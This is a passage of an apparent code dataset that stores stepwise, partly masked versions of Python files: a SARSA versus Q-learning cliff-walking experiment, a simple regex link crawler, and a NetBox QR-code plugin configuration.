next_state_q_value - state.q_values[action])\n\n\nN_STEPS = 10000\nMETHOD = 'BOTH'\nEPSILONS = [0.05, 0.1, 0.25]\n\n\ndef run_code(use_q_learning=False, _epsilon=0.01):\n states = initialize_states()\n decay = 1\n min_epsilon = 1e-05\n epsilon = _epsilon\n episode_rewards = []\n mistakes_array = []\n for i in range(N_STEPS):\n current_state = states[N_ROWS - 1][0]\n epsilon = max(min_epsilon, epsilon * decay)\n episode_reward = 0\n while not current_state.is_terminal():\n if random() < epsilon:\n next_action = randint(0, 3)\n else:\n next_action = current_state.get_max_q_index()\n di, dj = action_to_diff_vector(next_action)\n next_state = transition(states, current_state, di, dj)\n if random() < epsilon:\n next_state_action = randint(0, 3)\n else:\n next_state_action = next_state.get_max_q_index()\n if use_q_learning:\n reward, current_state.q_values[next_action] = q_learning(\n current_state, next_state, next_action, next_state_action)\n else:\n reward, current_state.q_values[next_action] = sarsa(\n current_state, next_state, next_action, next_state_action)\n episode_reward += reward\n current_state = next_state\n if len(episode_rewards):\n 
episode_rewards.append(episode_rewards[-1] + episode_reward)\n else:\n episode_rewards.append(episode_reward)\n \"\"\"\n if (i % 100 == 0):\n print(i)\n \"\"\"\n mistakes_array.append(check_accuracy(states))\n return np.array(mistakes_array), states, episode_rewards\n\n\ndef check_accuracy(states):\n correct_result = np.array([[-3, -2, -1, 0, 1, 2, 3, 4, 5, 6], [-2, -1, \n 0, 1, 2, 3, 4, 5, 6, 7], [-1, 0, 1, 2, 3, 4, 5, 6, 7, 8], [0, 1, 2,\n 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9, 10], [0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0]])\n mistakes_delta = 0\n for i in range(N_ROWS):\n for j in range(N_COLUMNS):\n mistakes_delta += abs(correct_result[i][j] - max(states[i][j].\n q_values))\n return mistakes_delta\n\n\ndef plot_errors(mistakes_sarsa, mistakes_q_learning):\n plt.gca().invert_yaxis()\n legend = []\n for mistake_sarsa in mistakes_sarsa:\n plt.plot(mistake_sarsa[1])\n legend.append('SARSA $\\\\epsilon={}$'.format(mistake_sarsa[0]))\n for mistake_q_learning in mistakes_q_learning:\n plt.plot(mistake_q_learning[1])\n legend.append('Q-learning $\\\\epsilon={}$'.format(mistake_q_learning[0])\n )\n plt.grid(which='y')\n plt.legend(legend)\n plt.savefig('CLIFF_SARSA_VS_Q_LEARNING_{}.png'.format(N_STEPS))\n\n\ndef plot_best_q_values_states(states, method, epsilon, PLOTS, fig, ax):\n final_grid = np.array([[max(states[i][j].q_values) for j in range(\n N_COLUMNS)] for i in range(N_ROWS)])\n if PLOTS > 2:\n ax = ax[PLOTS % 3, 1]\n else:\n ax = ax[PLOTS, 0]\n ax.imshow(final_grid, aspect='auto', cmap='coolwarm')\n ax.set_xticks(np.arange(N_COLUMNS))\n ax.set_yticks(np.arange(N_ROWS))\n ax.set_xticklabels([i for i in range(N_COLUMNS)])\n ax.set_yticklabels([i for i in range(N_ROWS)])\n plt.setp(ax.get_xticklabels(), rotation=45, ha='right', rotation_mode=\n 'anchor')\n for i in range(N_ROWS):\n for j in range(N_COLUMNS):\n text = ax.text(j, i, '{:.2f}'.format(max(states[i][j].q_values)\n ), ha='center', va='center', color='w')\n fig.tight_layout()\n ax.set_title('{}; $\\\\epsilon={}$'.format(method, epsilon))\n for i in range(N_ROWS):\n str_ = ''\n for j in range(N_COLUMNS):\n str_ += str(int(final_grid[i][j])) + ', '\n PLOTS += 1\n\n\ndef display_optimal_policy(states, method, epsilon):\n print('{}; ε = {}'.format(method, epsilon))\n print('-' * 60)\n for i in range(len(states)):\n line_str = ''\n for j in range(len(states[0])):\n if j == 0:\n print('|', end='')\n if states[i][j].is_goal:\n print(Back.GREEN + ' ', end='')\n print(Style.RESET_ALL + ' | ', end='')\n elif states[i][j].is_cliff:\n print(Back.RED + ' ', end='')\n print(Style.RESET_ALL + ' | ', end='')\n else:\n print(' {} | '.format(q_to_arrow(states[i][j].\n get_max_q_index())), end='')\n print(line_str)\n print('-' * 60)\n\n\nif METHOD not in ['Q_LEARNING', 'SARSA', 'BOTH']:\n print('invalidt method. 
must be Q_LEARNING or SARSA or both')\n import sys\n sys.exit()\nmistakes_q_learning = []\nmistakes_sarsa = []\nPLOTS = 0\nfig, axes = plt.subplots(3, 2)\nrewards = []\nfor epsilon in EPSILONS:\n if METHOD == 'Q_LEARNING' or METHOD == 'BOTH':\n _mistakes_q_learning, end_states_q_learning, episode_rewards = (\n run_code(use_q_learning=True, _epsilon=epsilon))\n plot_best_q_values_states(end_states_q_learning, 'Q_LEARNING',\n epsilon, PLOTS, fig, axes)\n display_optimal_policy(end_states_q_learning, 'Q LEARNING', epsilon)\n mistakes_q_learning.append((epsilon, _mistakes_q_learning))\n rewards.append(('Q_LEARNING', epsilon, episode_rewards))\n PLOTS += 1\nfor epsilon in EPSILONS:\n if METHOD == 'SARSA' or METHOD == 'BOTH':\n _mistakes_sarsa, end_states_sarsa, episode_rewards = run_code(\n use_q_learning=False, _epsilon=epsilon)\n plot_best_q_values_states(end_states_sarsa, 'SARSA', epsilon, PLOTS,\n fig, axes)\n display_optimal_policy(end_states_sarsa, 'SARSA', epsilon)\n mistakes_sarsa.append((epsilon, _mistakes_sarsa))\n rewards.append(('SARSA', epsilon, episode_rewards))\n PLOTS += 1\nplt.savefig('all_runs.png')\nplt.show()\nfor reward in rewards:\n plt.plot(reward[2], label='{} ε = {} '.format(reward[0], reward[1]))\n plt.xlabel('Episodes')\n plt.ylabel('Sum of rewards during episode')\nplt.legend()\nplt.show()\nplt.savefig('episode_rewards.png')\nplot_errors(mistakes_sarsa, mistakes_q_learning)\n",
"step-5": "from math import *\nfrom numpy import *\nfrom random import *\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom colorama import Fore, Back, Style\nfrom gridworld import q_to_arrow\n\n\nN_ROWS = 6\nN_COLUMNS = 10\n\nclass State(object):\n def __init__(self, i, j, is_cliff=False, is_goal=False):\n self.i = i\n self.j = j\n self.is_cliff = is_cliff\n self.is_goal = is_goal\n # north, east, south, west\n self.q_values = np.array([0.0, 0.0, 0.0, 0.0])\n\n def __str__(self):\n return '({}, {})'.format(self.i, self.j)\n\n def is_terminal(self):\n return self.is_goal or self.is_cliff\n\n def get_max_q_index(self):\n best_q_values = np.argwhere(self.q_values == np.max(self.q_values))\n if len(best_q_values) > 1:\n return best_q_values[randint(0, len(best_q_values) - 1)][0]\n else:\n _max_q = np.argmax(self.q_values)\n return _max_q\n\n def get_max_q_value(self):\n return np.max(self.q_values)\n\n\ndef initialize_states():\n # This is the set of states, all initialised with default values\n states = [[State(j, i) for i in range(N_COLUMNS)] for j in range(N_ROWS)]\n\n # make the cliff\n for j in range(1, N_COLUMNS - 1):\n states[-1][j].is_cliff = True\n\n states[-1][-1].is_goal = True\n return states\n\n\n# The reward function defines what reward I get for transitioning between the first and second state\ndef reward(s_1, s_2):\n if (s_1.is_goal or s_1.is_cliff):\n return 0\n elif (s_2.is_goal):\n return 10\n elif (s_2.is_cliff):\n return -100\n else:\n return -1\n\n\"\"\" the transition function takes state and action and results in a new state, depending on their attributes. The method takes the whole state-space as an argument (since the transition depends on the attributes of the states in the state-space), which could for example be the \"states\" matrix from above, the current state s from the state-space (with its attributes), and the current action, which takes the form of a \"difference vector. For example, dx = 0, dy = 1 means: Move to the south. 
dx = -1, dy = 0 means: Move to the left\"\"\"\ndef transition(stsp, s, di, dj):\n if (s.is_cliff or s.is_goal):\n return s\n elif (s.j + dj not in range(N_COLUMNS) or s.i + di not in range(N_ROWS)):\n return s\n else:\n return stsp[s.i + di][s.j + dj]\n\ngamma = 1\nlearning_rate = 0.01\n\ndef action_to_diff_vector(action):\n if action == 0: # NORTH\n return -1, 0\n elif action == 1: # EAST\n return 0, 1\n elif action == 2: # SOUTH\n return 1, 0\n elif action == 3: # WEST\n return 0, -1\n\ndef action_to_verbose(action):\n if action == 0:\n return 'NORTH'\n elif action == 1:\n return 'EAST'\n elif action == 2:\n return 'SOUTH'\n elif action == 3:\n return 'WEST'\n\n\ndef sarsa(state, next_state, action, next_state_action):\n return reward(state, next_state), state.q_values[action] +\\\n learning_rate * (reward(state, next_state) + gamma * next_state.q_values[next_state_action] - state.q_values[action])\n\n\ndef q_learning(state, next_state, action, next_state_action):\n next_state_q_value = next_state.get_max_q_value()\n return reward(state, next_state), state.q_values[action] +\\\n learning_rate * (reward(state, next_state) + gamma * next_state_q_value - state.q_values[action])\n\nN_STEPS = 10000\nMETHOD = 'BOTH'\nEPSILONS = [0.05, 0.1, 0.25]\n\ndef run_code(use_q_learning=False, _epsilon=0.01):\n states = initialize_states()\n decay = 1\n min_epsilon = 0.00001\n epsilon = _epsilon\n\n episode_rewards = []\n mistakes_array = [] # array which tracks error from convergence on each step\n for i in range(N_STEPS):\n # select a random starting state\n current_state = states[N_ROWS-1][0]\n\n # iterate until reaching a terminal state\n epsilon = max(min_epsilon, epsilon * decay)\n episode_reward = 0\n while not current_state.is_terminal():\n\n if random() < epsilon:\n next_action = randint(0, 3)\n else:\n next_action = current_state.get_max_q_index()\n\n di, dj = action_to_diff_vector(next_action)\n next_state = transition(states, current_state, di, dj)\n\n if random() < epsilon:\n next_state_action = randint(0, 3)\n else:\n next_state_action = next_state.get_max_q_index()\n\n if use_q_learning:\n reward, current_state.q_values[next_action] = q_learning(current_state, next_state, next_action, next_state_action)\n else:\n reward, current_state.q_values[next_action] = sarsa(current_state, next_state, next_action, next_state_action)\n\n # print(current_state, next_state, action_to_verbose(next_action), di, dj)\n episode_reward += reward\n current_state = next_state\n if len(episode_rewards):\n episode_rewards.append(episode_rewards[-1] + episode_reward)\n else:\n episode_rewards.append(episode_reward)\n\n '''\n if (i % 100 == 0):\n print(i)\n '''\n mistakes_array.append(check_accuracy(states))\n\n return np.array(mistakes_array), states, episode_rewards\n\ndef check_accuracy(states):\n correct_result = np.array([\n [-3, -2, -1, 0 , 1 , 2 , 3 , 4 , 5 , 6 ],\n [-2, -1, 0 , 1 , 2 , 3 , 4 , 5 , 6 , 7 ],\n [-1, 0 , 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 ],\n [0 , 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9 ],\n [1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9 , 10 ],\n [0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 ],\n ])\n mistakes_delta = 0\n for i in range(N_ROWS):\n for j in range(N_COLUMNS):\n mistakes_delta += abs(correct_result[i][j] - max(states[i][j].q_values))\n\n return mistakes_delta\n\ndef plot_errors(mistakes_sarsa, mistakes_q_learning):\n plt.gca().invert_yaxis()\n legend = []\n for mistake_sarsa in mistakes_sarsa:\n plt.plot(mistake_sarsa[1])\n legend.append(r'SARSA $\\epsilon={}$'.format(mistake_sarsa[0]))\n for 
mistake_q_learning in mistakes_q_learning:\n        plt.plot(mistake_q_learning[1])\n        legend.append(r'Q-learning $\\epsilon={}$'.format(mistake_q_learning[0]))\n\n    plt.grid(axis='y')\n    plt.legend(legend)\n\n    plt.savefig('CLIFF_SARSA_VS_Q_LEARNING_{}.png'.format(N_STEPS))\n    # plt.show()\n\ndef plot_best_q_values_states(states, method, epsilon, PLOTS, fig, ax):\n    final_grid = np.array([[max(states[i][j].q_values) for j in range(N_COLUMNS)] for i in range(N_ROWS)])\n    if PLOTS > 2:\n        ax = ax[PLOTS % 3, 1]\n    else:\n        ax = ax[PLOTS, 0]\n    ax.imshow(final_grid, aspect='auto', cmap='coolwarm')\n    # fig, ax = plt.subplots()\n    ax.set_xticks(np.arange(N_COLUMNS))\n    ax.set_yticks(np.arange(N_ROWS))\n    ax.set_xticklabels([i for i in range(N_COLUMNS)])\n    ax.set_yticklabels([i for i in range(N_ROWS)])\n    plt.setp(ax.get_xticklabels(), rotation=45, ha=\"right\",\n             rotation_mode=\"anchor\")\n\n    # Loop over data dimensions and create text annotations.\n    for i in range(N_ROWS):\n        for j in range(N_COLUMNS):\n            text = ax.text(j, i, '{:.2f}'.format(max(states[i][j].q_values)),\n                           ha=\"center\", va=\"center\", color=\"w\")\n\n    fig.tight_layout()\n    ax.set_title(\"{}; $\\\epsilon={}$\".format(method, epsilon))\n    for i in range(N_ROWS):\n        str_ = \"\"\n        for j in range(N_COLUMNS):\n            str_ += str(int(final_grid[i][j])) + \", \"\n    PLOTS += 1\n    # plt.savefig('CLIFF_WALKING: {}-{}-{}.png'.format(N_STEPS, epsilon, method))\n    # plt.show()\n\ndef display_optimal_policy(states, method, epsilon):\n\n    print(\"{}; ε = {}\".format(method, epsilon))\n    print('-' * 60)\n    for i in range(len(states)):\n        line_str = ''\n        for j in range(len(states[0])):\n            if j == 0:\n                print('|', end='')\n            if states[i][j].is_goal:\n                print(Back.GREEN + '  ', end='')\n                print(Style.RESET_ALL + ' | ', end='')\n            elif states[i][j].is_cliff:\n                print(Back.RED + '  ', end='')\n                print(Style.RESET_ALL + ' | ', end='')\n            else:\n                print(' {} | '.format(q_to_arrow(states[i][j].get_max_q_index())), end='')\n        print(line_str)\n        print('-' * 60)\n\nif METHOD not in ['Q_LEARNING', 'SARSA', 'BOTH']:\n    print('invalid method. must be Q_LEARNING, SARSA or BOTH')\n    import sys; sys.exit()\n\nmistakes_q_learning = []\nmistakes_sarsa = []\nPLOTS = 0\nfig, axes = plt.subplots(3, 2)\nrewards = []\nfor epsilon in EPSILONS:\n    if METHOD == 'Q_LEARNING' or METHOD == 'BOTH':\n        _mistakes_q_learning, end_states_q_learning, episode_rewards = run_code(use_q_learning=True, _epsilon=epsilon)\n        plot_best_q_values_states(end_states_q_learning, 'Q_LEARNING', epsilon, PLOTS, fig, axes)\n        display_optimal_policy(end_states_q_learning, 'Q LEARNING', epsilon)\n        mistakes_q_learning.append((epsilon, _mistakes_q_learning))\n        rewards.append(('Q_LEARNING', epsilon, episode_rewards))\n        PLOTS += 1\n\nfor epsilon in EPSILONS:\n    if METHOD == 'SARSA' or METHOD == 'BOTH':\n        _mistakes_sarsa, end_states_sarsa, episode_rewards = run_code(use_q_learning=False, _epsilon=epsilon)\n        plot_best_q_values_states(end_states_sarsa, 'SARSA', epsilon, PLOTS, fig, axes)\n        display_optimal_policy(end_states_sarsa, 'SARSA', epsilon)\n        mistakes_sarsa.append((epsilon, _mistakes_sarsa))\n        rewards.append(('SARSA', epsilon, episode_rewards))\n        PLOTS += 1\n\n\nplt.savefig('all_runs.png')\nplt.show()\n# for i, j in [(0, 3), (1, 4), (2, 5)]:\nfor reward in rewards:\n    # plt.plot(rewards[i][2], 'o', label='{} ε = {} '.format(rewards[i][0], rewards[i][1]))\n    # plt.plot(rewards[j][2], 'o', label='{} ε = {} '.format(rewards[j][0], rewards[j][1]))\n    plt.plot(reward[2], label='{} ε = {} '.format(reward[0], reward[1]))\n    plt.xlabel('Episodes')\n    plt.ylabel('Sum of rewards during episode')\nplt.legend()\nplt.savefig('episode_rewards.png')\nplt.show()\n\nplot_errors(mistakes_sarsa, mistakes_q_learning)\n",
"step-ids": [
14,
16,
20,
21,
22
]
}
|
[
14,
16,
20,
21,
22
] |
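The cliff-walking record above differs between its sarsa and q_learning functions only in the bootstrap target: SARSA backs up the Q-value of the action actually selected next, while Q-learning backs up the greedy maximum. A minimal standalone sketch of the two update rules (the toy table, constants, and function names are illustrative, not taken from the record):

import numpy as np

ALPHA, GAMMA = 0.01, 1.0  # chosen to mirror the record's learning_rate and gamma

def sarsa_update(q, s, a, r, s_next, a_next):
    # on-policy: bootstrap from the action the behaviour policy chose
    return q[s, a] + ALPHA * (r + GAMMA * q[s_next, a_next] - q[s, a])

def q_learning_update(q, s, a, r, s_next):
    # off-policy: bootstrap from the greedy action in the next state
    return q[s, a] + ALPHA * (r + GAMMA * np.max(q[s_next]) - q[s, a])

q = np.zeros((5, 4))  # 5 toy states, 4 actions
q[1, 2] = 1.0
print(sarsa_update(q, 0, 0, -1.0, 1, 0))    # backs up q[1, 0] = 0.0, giving -0.01
print(q_learning_update(q, 0, 0, -1.0, 1))  # backs up max(q[1]) = 1.0, giving 0.0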
<|reserved_special_token_0|>
class web_scrap:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __init__(self, seed):
self.seed = seed
self.set_tag()
self.set_attr()
self.fetch_web(self.seed)
self.crawl()
def fetch_web(self, link):
self.result = r.get(link)
self.extract_tags()
def set_tag(self):
self.re_tag = '(<a [^>]+>)'
def set_attr(self):
self.re_attr_parser = 'href\\=\\"([^\\"]+)\\"'
def extract_tags(self):
title = re.findall('<title>([^<]+)</title>', self.result.text)
if len(title) != 0:
print(title[0])
else:
print('No Title')
tags = re.findall(self.re_tag, self.result.text)
for i in tags:
self.attr_parser(i)
def attr_parser(self, tag):
attributes = re.findall(self.re_attr_parser, tag)
for data in attributes:
if data[0] == '/':
if data[1] == '/':
self.tag_attr.append({data[1:]: 0})
else:
self.tag_attr.append({data: 0})
def crawl(self):
for i in self.tag_attr:
link = list(i.keys())[0]
if not i[link]:
print(link)
self.fetch_web(self.seed + link)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class web_scrap:
seed = ''
result = ''
tag_attr = []
def __init__(self, seed):
self.seed = seed
self.set_tag()
self.set_attr()
self.fetch_web(self.seed)
self.crawl()
def fetch_web(self, link):
self.result = r.get(link)
self.extract_tags()
def set_tag(self):
self.re_tag = '(<a [^>]+>)'
def set_attr(self):
self.re_attr_parser = 'href\\=\\"([^\\"]+)\\"'
def extract_tags(self):
title = re.findall('<title>([^<]+)</title>', self.result.text)
if len(title) != 0:
print(title[0])
else:
print('No Title')
tags = re.findall(self.re_tag, self.result.text)
for i in tags:
self.attr_parser(i)
def attr_parser(self, tag):
attributes = re.findall(self.re_attr_parser, tag)
for data in attributes:
if data[0] == '/':
if data[1] == '/':
self.tag_attr.append({data[1:]: 0})
else:
self.tag_attr.append({data: 0})
def crawl(self):
for i in self.tag_attr:
link = list(i.keys())[0]
if not i[link]:
print(link)
self.fetch_web(self.seed + link)
print('\t HELLO WELCOME TO EMAIL SCRAPER')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class web_scrap:
seed = ''
result = ''
tag_attr = []
def __init__(self, seed):
self.seed = seed
self.set_tag()
self.set_attr()
self.fetch_web(self.seed)
self.crawl()
def fetch_web(self, link):
self.result = r.get(link)
self.extract_tags()
def set_tag(self):
self.re_tag = '(<a [^>]+>)'
def set_attr(self):
self.re_attr_parser = 'href\\=\\"([^\\"]+)\\"'
def extract_tags(self):
title = re.findall('<title>([^<]+)</title>', self.result.text)
if len(title) != 0:
print(title[0])
else:
print('No Title')
tags = re.findall(self.re_tag, self.result.text)
for i in tags:
self.attr_parser(i)
def attr_parser(self, tag):
attributes = re.findall(self.re_attr_parser, tag)
for data in attributes:
if data[0] == '/':
if data[1] == '/':
self.tag_attr.append({data[1:]: 0})
else:
self.tag_attr.append({data: 0})
def crawl(self):
for i in self.tag_attr:
link = list(i.keys())[0]
if not i[link]:
print(link)
self.fetch_web(self.seed + link)
print('\t HELLO WELCOME TO EMAIL SCRAPER')
scrap = web_scrap(input('enter the link \t'))
<|reserved_special_token_1|>
import requests as r
import re
class web_scrap:
seed = ''
result = ''
tag_attr = []
def __init__(self, seed):
self.seed = seed
self.set_tag()
self.set_attr()
self.fetch_web(self.seed)
self.crawl()
def fetch_web(self, link):
self.result = r.get(link)
self.extract_tags()
def set_tag(self):
self.re_tag = '(<a [^>]+>)'
def set_attr(self):
self.re_attr_parser = 'href\\=\\"([^\\"]+)\\"'
def extract_tags(self):
title = re.findall('<title>([^<]+)</title>', self.result.text)
if len(title) != 0:
print(title[0])
else:
print('No Title')
tags = re.findall(self.re_tag, self.result.text)
for i in tags:
self.attr_parser(i)
def attr_parser(self, tag):
attributes = re.findall(self.re_attr_parser, tag)
for data in attributes:
if data[0] == '/':
if data[1] == '/':
self.tag_attr.append({data[1:]: 0})
else:
self.tag_attr.append({data: 0})
def crawl(self):
for i in self.tag_attr:
link = list(i.keys())[0]
if not i[link]:
print(link)
self.fetch_web(self.seed + link)
print('\t HELLO WELCOME TO EMAIL SCRAPER')
scrap = web_scrap(input('enter the link \t'))
<|reserved_special_token_1|>
import requests as r
import re
class web_scrap:
seed=""
result=""
tag_attr=[]
def __init__(self,seed):
self.seed=seed
self.set_tag()
self.set_attr()
self.fetch_web(self.seed)
self.crawl()
def fetch_web(self,link):
self.result=r.get(link)
self.extract_tags()
def set_tag(self):
self.re_tag=r"(<a [^>]+>)"
def set_attr(self):
self.re_attr_parser=r"href\=\"([^\"]+)\""
def extract_tags(self):
title=re.findall(r"<title>([^<]+)</title>",self.result.text)
if len(title)!=0:
print(title[0])
else:
print("No Title")
tags=re.findall(self.re_tag,self.result.text)
for i in tags:
self.attr_parser(i)
def attr_parser(self,tag):
attributes=re.findall(self.re_attr_parser,tag)
for data in attributes:
if data[0]=="/":
if data[1]=="/":
self.tag_attr.append({data[1:]:0})
else:
self.tag_attr.append({data:0})
def crawl(self):
for i in self.tag_attr:
link=list(i.keys())[0]
if(not i[link]):
print(link)
self.fetch_web(self.seed+link)
print("\t HELLO WELCOME TO EMAIL SCRAPPER")
scrap=web_scrap(input("enter the link \t"))
|
flexible
|
{
"blob_id": "f26dc3139413c4ed4b04484c095a433e53039cdb",
"index": 3028,
"step-1": "<mask token>\n\n\nclass web_scrap:\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, seed):\n self.seed = seed\n self.set_tag()\n self.set_attr()\n self.fetch_web(self.seed)\n self.crawl()\n\n def fetch_web(self, link):\n self.result = r.get(link)\n self.extract_tags()\n\n def set_tag(self):\n self.re_tag = '(<a [^>]+>)'\n\n def set_attr(self):\n self.re_attr_parser = 'href\\\\=\\\\\"([^\\\\\"]+)\\\\\"'\n\n def extract_tags(self):\n title = re.findall('<title>([^<]+)</title>', self.result.text)\n if len(title) != 0:\n print(title[0])\n else:\n print('No Title')\n tags = re.findall(self.re_tag, self.result.text)\n for i in tags:\n self.attr_parser(i)\n\n def attr_parser(self, tag):\n attributes = re.findall(self.re_attr_parser, tag)\n for data in attributes:\n if data[0] == '/':\n if data[1] == '/':\n self.tag_attr.append({data[1:]: 0})\n else:\n self.tag_attr.append({data: 0})\n\n def crawl(self):\n for i in self.tag_attr:\n link = list(i.keys())[0]\n if not i[link]:\n print(link)\n self.fetch_web(self.seed + link)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass web_scrap:\n seed = ''\n result = ''\n tag_attr = []\n\n def __init__(self, seed):\n self.seed = seed\n self.set_tag()\n self.set_attr()\n self.fetch_web(self.seed)\n self.crawl()\n\n def fetch_web(self, link):\n self.result = r.get(link)\n self.extract_tags()\n\n def set_tag(self):\n self.re_tag = '(<a [^>]+>)'\n\n def set_attr(self):\n self.re_attr_parser = 'href\\\\=\\\\\"([^\\\\\"]+)\\\\\"'\n\n def extract_tags(self):\n title = re.findall('<title>([^<]+)</title>', self.result.text)\n if len(title) != 0:\n print(title[0])\n else:\n print('No Title')\n tags = re.findall(self.re_tag, self.result.text)\n for i in tags:\n self.attr_parser(i)\n\n def attr_parser(self, tag):\n attributes = re.findall(self.re_attr_parser, tag)\n for data in attributes:\n if data[0] == '/':\n if data[1] == '/':\n self.tag_attr.append({data[1:]: 0})\n else:\n self.tag_attr.append({data: 0})\n\n def crawl(self):\n for i in self.tag_attr:\n link = list(i.keys())[0]\n if not i[link]:\n print(link)\n self.fetch_web(self.seed + link)\n\n\nprint('\\t HELLO WELCOME TO EMAIL SCRAPPER')\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass web_scrap:\n seed = ''\n result = ''\n tag_attr = []\n\n def __init__(self, seed):\n self.seed = seed\n self.set_tag()\n self.set_attr()\n self.fetch_web(self.seed)\n self.crawl()\n\n def fetch_web(self, link):\n self.result = r.get(link)\n self.extract_tags()\n\n def set_tag(self):\n self.re_tag = '(<a [^>]+>)'\n\n def set_attr(self):\n self.re_attr_parser = 'href\\\\=\\\\\"([^\\\\\"]+)\\\\\"'\n\n def extract_tags(self):\n title = re.findall('<title>([^<]+)</title>', self.result.text)\n if len(title) != 0:\n print(title[0])\n else:\n print('No Title')\n tags = re.findall(self.re_tag, self.result.text)\n for i in tags:\n self.attr_parser(i)\n\n def attr_parser(self, tag):\n attributes = re.findall(self.re_attr_parser, tag)\n for data in attributes:\n if data[0] == '/':\n if data[1] == '/':\n self.tag_attr.append({data[1:]: 0})\n else:\n self.tag_attr.append({data: 0})\n\n def crawl(self):\n for i in self.tag_attr:\n link = list(i.keys())[0]\n if not i[link]:\n print(link)\n self.fetch_web(self.seed + link)\n\n\nprint('\\t HELLO WELCOME TO EMAIL SCRAPPER')\nscrap = web_scrap(input('enter the link \\t'))\n",
"step-4": "import requests as r\nimport re\n\n\nclass web_scrap:\n seed = ''\n result = ''\n tag_attr = []\n\n def __init__(self, seed):\n self.seed = seed\n self.set_tag()\n self.set_attr()\n self.fetch_web(self.seed)\n self.crawl()\n\n def fetch_web(self, link):\n self.result = r.get(link)\n self.extract_tags()\n\n def set_tag(self):\n self.re_tag = '(<a [^>]+>)'\n\n def set_attr(self):\n self.re_attr_parser = 'href\\\\=\\\\\"([^\\\\\"]+)\\\\\"'\n\n def extract_tags(self):\n title = re.findall('<title>([^<]+)</title>', self.result.text)\n if len(title) != 0:\n print(title[0])\n else:\n print('No Title')\n tags = re.findall(self.re_tag, self.result.text)\n for i in tags:\n self.attr_parser(i)\n\n def attr_parser(self, tag):\n attributes = re.findall(self.re_attr_parser, tag)\n for data in attributes:\n if data[0] == '/':\n if data[1] == '/':\n self.tag_attr.append({data[1:]: 0})\n else:\n self.tag_attr.append({data: 0})\n\n def crawl(self):\n for i in self.tag_attr:\n link = list(i.keys())[0]\n if not i[link]:\n print(link)\n self.fetch_web(self.seed + link)\n\n\nprint('\\t HELLO WELCOME TO EMAIL SCRAPPER')\nscrap = web_scrap(input('enter the link \\t'))\n",
"step-5": "import requests as r\r\nimport re\r\nclass web_scrap:\r\n seed=\"\"\r\n result=\"\"\r\n tag_attr=[]\r\n \r\n def __init__(self,seed):\r\n self.seed=seed\r\n self.set_tag()\r\n self.set_attr()\r\n self.fetch_web(self.seed)\r\n self.crawl() \r\n\r\n\r\n def fetch_web(self,link):\r\n self.result=r.get(link)\r\n self.extract_tags()\r\n \r\n def set_tag(self):\r\n self.re_tag=r\"(<a [^>]+>)\"\r\n\r\n def set_attr(self):\r\n self.re_attr_parser=r\"href\\=\\\"([^\\\"]+)\\\"\"\r\n\r\n def extract_tags(self):\r\n title=re.findall(r\"<title>([^<]+)</title>\",self.result.text)\r\n if len(title)!=0:\r\n print(title[0])\r\n else:\r\n print(\"No Title\")\r\n tags=re.findall(self.re_tag,self.result.text)\r\n for i in tags:\r\n self.attr_parser(i)\r\n\r\n def attr_parser(self,tag):\r\n attributes=re.findall(self.re_attr_parser,tag)\r\n for data in attributes:\r\n if data[0]==\"/\":\r\n if data[1]==\"/\":\r\n self.tag_attr.append({data[1:]:0})\r\n else:\r\n self.tag_attr.append({data:0})\r\n \r\n def crawl(self):\r\n for i in self.tag_attr:\r\n link=list(i.keys())[0]\r\n if(not i[link]):\r\n print(link)\r\n self.fetch_web(self.seed+link)\r\n \r\n \r\n \r\nprint(\"\\t HELLO WELCOME TO EMAIL SCRAPPER\")\r\n\r\nscrap=web_scrap(input(\"enter the link \\t\"))\r\n",
"step-ids": [
8,
10,
11,
12,
13
]
}
|
[
8,
10,
11,
12,
13
] |
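One caveat on the web_scrap record above: crawl iterates over tag_attr while fetch_web keeps appending to it, and the 0 flag stored as each dict's value is never set afterwards, so the same links can be queued and fetched repeatedly. A sketch of a bounded alternative with an explicit visited set (an illustrative rewrite, not the record's code):

import re
import requests as r

def crawl(seed, max_pages=20):
    queue, visited = [seed], set()
    while queue and len(visited) < max_pages:
        url = queue.pop(0)
        if url in visited:
            continue
        visited.add(url)
        text = r.get(url).text
        for href in re.findall(r'href="([^"]+)"', text):
            # follow site-relative links only; skip protocol-relative //host paths
            if href.startswith('/') and not href.startswith('//'):
                queue.append(seed + href)
    return visited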
from extras.plugins import PluginConfig
from .version import __version__
class QRCodeConfig(PluginConfig):
name = 'netbox_qrcode'
verbose_name = 'qrcode'
description = 'Generate QR codes for the objects'
version = __version__
author = 'Nikolay Yuzefovich'
author_email = '[email protected]'
required_settings = []
default_settings = {
'with_text': True,
'text_fields': ['name', 'serial'],
'font': 'TahomaBold',
'custom_text': None,
'text_location': 'right',
'qr_version': 1,
'qr_error_correction': 0,
'qr_box_size': 6,
'qr_border': 4,
'device': {
'text_fields': ['name', 'serial']
},
'rack': {
'text_fields': ['name']
},
'cable': {
'text_fields': [
'_termination_a_device',
'termination_a',
'_termination_b_device',
'termination_b',
]
}
}
config = QRCodeConfig # noqa E305
|
normal
|
{
"blob_id": "6306acd1508698687842ba6b55a839743af420cc",
"index": 5840,
"step-1": "<mask token>\n\n\nclass QRCodeConfig(PluginConfig):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\n<mask token>\n",
